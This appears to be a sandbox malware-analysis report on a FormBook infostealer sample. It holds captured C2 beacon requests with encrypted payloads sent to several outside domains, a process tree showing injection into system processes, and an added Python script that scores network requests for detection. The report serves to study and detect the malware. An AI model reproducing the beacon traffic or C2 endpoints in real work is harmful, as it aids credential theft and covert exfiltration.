                                                                                        Data Raw: 41 36 30 64 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 69 77 75 79 6f 6f 72 49 66 2b 77 64 6f 54 78 31 43 30 61 4a 35 4b 66 76 68 4d 38 4b 39 51 34 66 35 52 46 4a 36 49 55 6e 46 58 39 44 68 4a 78 35 61 41 52 4d 55 4b 50 37 72 73 79 34 6c 50 42 6e 68 58 6b 6d 37 78 61 65 48 6d 61 4b 65 4b 66 64 43 44 64 36 4c 4c 74 2f 76 55 6e 71 4f 43 45 30 42 2f 32 35 7a 34 67 32 46 7a 55 43 61 58 45 75 2f 4a 46 52 79 48 42 4d 6a 43 36 66 7a 58 65 71 66 77 53 42 6d 66 6a 51 30 53 39 4d 59 4f 6a 6a 6c 5a 75 66 6c 66 44 6f 74 6d 41 30 6d 43 4c 42 6d 51 47 55 2f 2b 61 6c 74 54 36 76 4d 59 69 59 4a 43 6f 59 4c 4a 39 48 56 63 76 76 63 69 32 64 44 45 4a 68 78 62 4d 45 6f 42 73 37 37 77 65 71 7a 4e 49 6d 5a 76 36 6a 6e 61 42 41 48 6c 6e 6a 45 4a 72 44 33 38 79 31 42 39 53 45 52 4e 6b 56 56 75 78 44 68 49 76 33 2f 73 76 49 4b 78 4a 4e 58 6f 6d 37 38 53 55 67 36 72 34 50 54 72 6f 53 53 4e 52 67 49 52 44 2b 4c 78 6b 53 6c 39 76 7a 47 2f 48 46 4f 4a 78 51 79 6b 5a 2b 31 6d 45 63 5a 71 54 31 6d 65 65 79 79 76 30 74 49 50 46 44 33 [TRUNCATED]
                                                                                         Data Ascii: A60d=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Q4f5RFJ6IUnFX9DhJx5aARMUKP7rsy4lPBnhXkm7xaeHmaKeKfdCDd6LLt/vUnqOCE0B/25z4g2FzUCaXEu/JFRyHBMjC6fzXeqfwSBmfjQ0S9MYOjjlZuflfDotmA0mCLBmQGU/+altT6vMYiYJCoYLJ9HVcvvci2dDEJhxbMEoBs77weqzNImZv6jnaBAHlnjEJrD38y1B9SERNkVVuxDhIv3/svIKxJNXom78SUg6r4PTroSSNRgIRD+LxkSl9vzG/HFOJxQykZ+1mEcZqT1meeyyv0tIPFD3 [TRUNCATED]


                                                                                         Session ID: 48 | Source IP: 192.168.2.8 | Source Port: 49756 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:02:41.907115936 CET | 381 | OUT | GET /fjsq/?A60d=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSZEPIXc/cFilHIaBazWG3FiJEFNWk2bg6JB0HDDUtnLYhkw==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.yushaliu.online
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                         Nov 6, 2024 16:02:42.976943016 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                        Date: Wed, 06 Nov 2024 15:02:42 GMT
                                                                                        Server: Apache
                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_e9aOsaYU3kKuYcCnH2I/18nX8+3ivsoYfSeY0xgo33EvOXPRFkozVr0P2juUHqvYJV+uDYFnQ7wk2IXTS1h5IA==
                                                                                        Content-Length: 2615
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 65 39 61 4f 73 61 59 55 33 6b 4b 75 59 63 43 6e 48 32 49 2f 31 38 6e 58 38 2b 33 69 76 73 6f 59 66 53 65 59 30 78 67 6f 33 33 45 76 4f 58 50 52 46 6b 6f 7a 56 72 30 50 32 6a 75 55 48 71 76 59 4a 56 2b 75 44 59 46 6e 51 37 77 6b 32 49 58 54 53 31 68 35 49 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_e9aOsaYU3kKuYcCnH2I/18nX8+3ivsoYfSeY0xgo33EvOXPRFkozVr0P2juUHqvYJV+uDYFnQ7wk2IXTS1h5IA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.yushaliu.online/px.js?ch=1">
                                                                                         Nov 6, 2024 16:02:42.976991892 CET | 1236 | IN | Data Raw: 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 79 75 73 68 61 6c 69 75 2e 6f 6e 6c 69 6e 65 2f 70 78 2e 6a 73 3f 63 68 3d 32
                                                                                        Data Ascii: </script><script type="text/javascript" src="http://www.yushaliu.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";img
                                                                                         Nov 6, 2024 16:02:42.977005959 CET | 987 | IN | Data Raw: 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74
                                                                                        Data Ascii: ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="t
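The sessions above show one request shape repeated against three hosts: a POST to a four-character directory with a single form field named A60d holding base64, then a GET with the same field in the query string, every request carrying the same Windows 7 / Chrome 33 User-Agent and, on the POSTs, an Origin and Referer that point back at the beacon path itself. The Python below is an added example for this report, not Joe Sandbox or FormBook code. It parses copies of the session 42 and session 44 requests (constructed from the headers shown on this page, with a few headers dropped for brevity) plus one constructed benign request, and lists which of those traits each request shares. The field name A60d, the four-character path, the User-Agent build string and the 100-character threshold are taken from or fitted to these sessions and are assumptions for this sample, not a general FormBook signature.

```python
"""Score HTTP requests against the beaconing shape seen in the sessions above.

Added example for this report; not Joe Sandbox code and not FormBook's own code.
The request texts are constructed from the headers shown on this page (sessions
42 and 44) plus one benign request; the thresholds are assumptions fitted to them.
"""
import base64
import re
from urllib.parse import urlparse

# Build string carried by every request in the capture: Chrome 33 on Windows 7.
STATIC_UA = "Chrome/33.0.1726.0"
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

SAMPLE_REQUESTS = [
    # Constructed from session 42: POST with a single form field (abridged headers).
    "POST /95c0/ HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 225\r\n"
    "Connection: close\r\n"
    "Host: www.vehiculargustav.click\r\n"
    "Origin: http://www.vehiculargustav.click\r\n"
    "Referer: http://www.vehiculargustav.click/95c0/\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/33.0.1726.0 Safari/537.36\r\n\r\n"
    "A60d=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Tj9dYEgyAp9TRNvc0mVS1zKY1i/YFH9dZr5RnBciD3ZPdxt24CpIaPeag30IfLqI1VGILZM6EbvKTYHFiglglifolE/J7Los6h2DOoaSK6uE+dAxPkkz0c/MTeRPWKFHlP4JFZ3F2CHhk6wxM9hK3sfqoAoNn5u/JzGyRtysVDscXrTEf3",
    # Constructed from session 44: GET with the same field in the query string.
    "GET /95c0/?A60d=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4WstlnU8yga+uYMkloLbvjpkOD6D/HpsAt4GJWXyRqysedQ==&QftlZ=CnaPg8j HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Connection: close\r\n"
    "Host: www.vehiculargustav.click\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/33.0.1726.0 Safari/537.36\r\n\r\n",
    # Constructed benign request for contrast (hostname is an assumption).
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def beacon_param(req):
    """Return (name, value) of the first form or query field, or None if there is none."""
    if req["method"] == "POST":
        field = req["body"]
    else:
        field = urlparse(req["target"]).query.split("&", 1)[0]
    name, sep, value = field.partition("=")
    return (name, value) if sep else None


def is_opaque(value):
    """True if value is base64 whose decoded bytes are mostly non-printable (ciphertext-like)."""
    if not B64_RE.match(value) or len(value) % 4:
        return False
    data = base64.b64decode(value)
    printable = sum(0x20 <= b <= 0x7E for b in data)
    return printable / len(data) < 0.9


def score(req):
    """List the traits of the captured beacons that this request shares (0 to 4)."""
    reasons = []
    h = req["headers"]
    path = urlparse(req["target"]).path
    host = h.get("host", "")
    if re.fullmatch(r"/[a-z0-9]{4}/", path):
        reasons.append("four-character directory as the only path element")
    if STATIC_UA in h.get("user-agent", ""):
        reasons.append("static, years-old User-Agent build string")
    if host and h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{path}":
        reasons.append("Origin and Referer name the beacon path itself")
    param = beacon_param(req)
    if param and len(param[0]) <= 6 and len(param[1]) >= 100 and is_opaque(param[1]):
        reasons.append(f"single opaque field {param[0]!r} carrying {len(param[1])} base64 chars")
    return reasons


def triage(raw_requests):
    """Return [(request line, reasons)] for each request; an empty reasons list is a non-match."""
    out = []
    for raw in raw_requests:
        req = parse_request(raw)
        out.append((f"{req['method']} {req['target']}", score(req)))
    return out


if __name__ == "__main__":
    for line, reasons in triage(SAMPLE_REQUESTS):
        print(f"{len(reasons)}/4  {line[:60]}")
        for r in reasons:
            print("    -", r)
```

Run as a script it prints a 0-4 score per request: the session 42 POST shares all four traits, the session 44 GET three (no Origin/Referer), the benign request none. The literals (A60d, the four-character directory, the Chrome 33 build) are specific to this sample, so in a proxy-log pipeline the combination of traits is the indicator, not any single value.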


                                                                                         Session ID: 49 | Source IP: 192.168.2.8 | Source Port: 49757 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:02:48.054140091 CET | 657 | OUT | POST /ucmb/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.marketprediction.app
                                                                                        Origin: http://www.marketprediction.app
                                                                                        Referer: http://www.marketprediction.app/ucmb/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 2f 74 50 34 77 36 76 6b 72 57 47 54 57 45 51 50 39 50 7a 33 4c 42 75 7a 46 41 6a 4b 73 66 64 75 7a 4a 6e 50 4f 4f 31 72 62 75 58 32 34 39 31 72 65 61 47 77 6d 43 78 6a 72 4c 74 69 61 50 65 61 77 48 50 45 4d 50 76 79 31 54 69 2b 5a 76 36 54 76 35 6d 72 6c 34 4e 45 70 53 68 74 46 58 62 38 6d 30 6d 50 37 74 57 31 4b 46 5a 36 39 63 62 44 33 6d 52 4a 67 66 39 45 77 59 61 52 73 34 4e 58 7a 51 34 32 48 36 6b 39 5a 6d 4d 67 33 4f 35 41 2b 39 2b 38 53 39 4c 44 59 47 4b 75 6a 67 33 49 74 4e 4e 56 70 58 47 57 73 71 57 5a 46 46 36 5a 46 76 6c 57 48 69 77 35 31 69 63 3d
                                                                                        Data Ascii: A60d=in6yu/YF+9DT/tP4w6vkrWGTWEQP9Pz3LBuzFAjKsfduzJnPOO1rbuX2491reaGwmCxjrLtiaPeawHPEMPvy1Ti+Zv6Tv5mrl4NEpShtFXb8m0mP7tW1KFZ69cbD3mRJgf9EwYaRs4NXzQ42H6k9ZmMg3O5A+9+8S9LDYGKujg3ItNNVpXGWsqWZFF6ZFvlWHiw51ic=


                                                                                        Session ID:50
                                                                                        Source IP:192.168.2.8
                                                                                        Source Port:49758
                                                                                        Destination IP:3.33.130.190
                                                                                        Destination Port:80
                                                                                        PID:5188
                                                                                        Process:C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp:Nov 6, 2024 16:02:50.599817991 CET
                                                                                        Bytes transferred:677
                                                                                        Direction:OUT
                                                                                        Data:POST /ucmb/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.marketprediction.app
                                                                                        Origin: http://www.marketprediction.app
                                                                                        Referer: http://www.marketprediction.app/ucmb/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Ascii: A60d=in6yu/YF+9DT5N/4jNTks2GQTEQPzvzsLBqzFBnass1u2cDPPP1reuX2zd1iU6GumC9BrKRiaO6awG/EM+vxzDiGRP6RxJmrl4NEpSk6FXD8mEWP6MW0M1Z9rMbDm2RNgf9ywd7Ms6FXzSw2Hrk+QmMm4u4cxO73etLcU1yJhzf2hb8/z1OQvq+yFGSvAY4+dBgJr1Ie5JybmhByEC3F9hqp0qA6


                                                                                        Session ID:51
                                                                                        Source IP:192.168.2.8
                                                                                        Source Port:49759
                                                                                        Destination IP:3.33.130.190
                                                                                        Destination Port:80
                                                                                        PID:5188
                                                                                        Process:C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp:Nov 6, 2024 16:02:53.145545006 CET
                                                                                        Bytes transferred:1694
                                                                                        Direction:OUT
                                                                                        Data:POST /ucmb/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.marketprediction.app
                                                                                        Origin: http://www.marketprediction.app
                                                                                        Referer: http://www.marketprediction.app/ucmb/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Ascii: A60d= [TRUNCATED]


                                                                                        Session ID:52
                                                                                        Source IP:192.168.2.8
                                                                                        Source Port:49760
                                                                                        Destination IP:3.33.130.190
                                                                                        Destination Port:80
                                                                                        PID:5188
                                                                                        Process:C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp:Nov 6, 2024 16:02:55.693525076 CET
                                                                                        Bytes transferred:386
                                                                                        Direction:OUT
                                                                                        Data:GET /ucmb/?QftlZ=CnaPg8j&A60d=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLyg6sZMK+n6SnxPYLsSNnFHqgmG+z3/fMKl0erdP4+1Q9hQ== HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.marketprediction.app
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Timestamp:Nov 6, 2024 16:02:56.323554993 CET
                                                                                        Bytes transferred:406
                                                                                        Direction:IN
                                                                                        Data:HTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 06 Nov 2024 15:02:56 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 266
                                                                                        Connection: close
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QftlZ=CnaPg8j&A60d=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLyg6sZMK+n6SnxPYLsSNnFHqgmG+z3/fMKl0erdP4+1Q9hQ=="}</script></head></html>


                                                                                        Session ID:53
                                                                                        Source IP:192.168.2.8
                                                                                        Source Port:49761
                                                                                        Destination IP:3.33.130.190
                                                                                        Destination Port:80
                                                                                        PID:5188
                                                                                        Process:C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp:Nov 6, 2024 16:03:13.332119942 CET
                                                                                        Bytes transferred:387
                                                                                        Direction:OUT
                                                                                        Data:GET /yjfe/?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.corpseflowerwatch.org
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Timestamp:Nov 6, 2024 16:03:13.974917889 CET
                                                                                        Bytes transferred:406
                                                                                        Direction:IN
                                                                                        Data:HTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 06 Nov 2024 15:03:13 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 266
                                                                                        Connection: close
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j"}</script></head></html>



                                                                                        Target ID:0
                                                                                        Start time:09:59:06
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Users\user\Desktop\XhAQ0Rk63O.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\XhAQ0Rk63O.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'330'101 bytes
                                                                                        MD5 hash:1641128999C6968823CA0D92CB8F0ECE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:09:59:08
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\XhAQ0Rk63O.exe"
                                                                                        Imagebase:0xbe0000
                                                                                        File size:46'504 bytes
                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:09:59:13
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe"
                                                                                        Imagebase:0x180000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:4
                                                                                        Start time:09:59:19
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                        Imagebase:0x740000
                                                                                        File size:47'104 bytes
                                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:7
                                                                                        Start time:09:59:43
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff6d20e0000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:3.3%
                                                                                          Dynamic/Decrypted Code Coverage:1.1%
                                                                                          Signature Coverage:4.1%
                                                                                          Total number of Nodes:1676
                                                                                          Total number of Limit Nodes:52
84865 401c3a 84862->84865 84866 42a9cd 84862->84866 84890 40df50 75 API calls 84863->84890 84865->84863 84867 401c44 84865->84867 84891 40d3b0 75 API calls 2 library calls 84866->84891 84889 40d3b0 75 API calls 2 library calls 84867->84889 84870 42a9dc 84871 401c53 _memset _wcscpy _wcsncpy 84870->84871 84872 42a9f0 84870->84872 84875 401cc2 Shell_NotifyIconW 84871->84875 84892 40d3b0 75 API calls 2 library calls 84872->84892 84874 42a9fe 84875->84876 84876->84844 84878 42a598 84877->84878 84880 4021f1 _wcslen 84877->84880 84894 40c740 84878->84894 84882 402205 84880->84882 84883 402226 84880->84883 84881 42a5a2 84893 404020 75 API calls ctype 84882->84893 84884 401380 75 API calls 84883->84884 84887 40222d 84884->84887 84886 40220c _realloc 84886->84862 84887->84881 84888 41171a 75 API calls 84887->84888 84888->84886 84889->84871 84890->84871 84891->84870 84892->84874 84893->84886 84895 40c752 84894->84895 84896 40c747 84894->84896 84895->84881 84896->84895 84899 402ae0 84896->84899 84898 42a572 _realloc 84898->84881 84900 42a06a 84899->84900 84901 402aef 84899->84901 84902 401380 75 API calls 84900->84902 84901->84898 84903 42a072 84902->84903 84904 41171a 75 API calls 84903->84904 84905 42a095 _realloc 84904->84905 84905->84898 84906 40c170 84907 40c17b 84906->84907 84914 40c1a5 _realloc 84906->84914 84908 40c1d6 84907->84908 84909 40c19b 84907->84909 84907->84914 84911 41171a 75 API calls 84908->84911 84915 4034b0 84909->84915 84912 40c1df 84911->84912 84913 41171a 75 API calls 84912->84913 84912->84914 84913->84914 84916 4034b9 84915->84916 84917 4034bd 84915->84917 84916->84914 84918 41171a 75 API calls 84917->84918 84919 42a0ba 84917->84919 84920 4034fe _realloc ctype 84918->84920 84920->84914 84921 40f110 RegOpenKeyExW 84922 40f13c RegQueryValueExW RegCloseKey 84921->84922 84923 40f15f 84921->84923 84922->84923 84924 416193 84961 41718c 84924->84961 84926 41619f GetStartupInfoW 84928 4161c2 84926->84928 84962 41aa31 HeapCreate 84928->84962 84930 416212 84964 
